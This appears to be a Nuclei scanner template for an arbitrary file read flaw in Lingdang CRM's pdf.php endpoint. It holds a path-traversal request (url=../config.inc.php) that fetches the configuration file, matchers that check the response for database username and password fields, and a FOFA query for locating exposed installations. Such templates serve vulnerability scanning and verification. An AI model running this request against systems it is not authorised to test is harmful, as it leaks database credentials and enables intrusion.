id: lingdang-crm-pdfurl-fileread
info:
  name: 灵当 CRM pdf.php - fileread
  author: leadlife
  severity: high
  description: 灵当CRM系统接口pdf.php接口处存在任意文件读取漏洞，允许攻击者通过恶意读取系统配置文件，获取敏感信息。
  reference: 
    - https://github.com/wy876/POC/blob/main/%E7%81%B5%E5%BD%93CRM/%E7%81%B5%E5%BD%93CRM%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3pdf.php%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
    hunter-query: demo
  tags: lingdang,crm,fileread

http:
  - method: GET
    path:
      - "{{BaseURL}}/crm/data/pdf.php?url=../config.inc.php"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'db_username','db_password')
        condition: and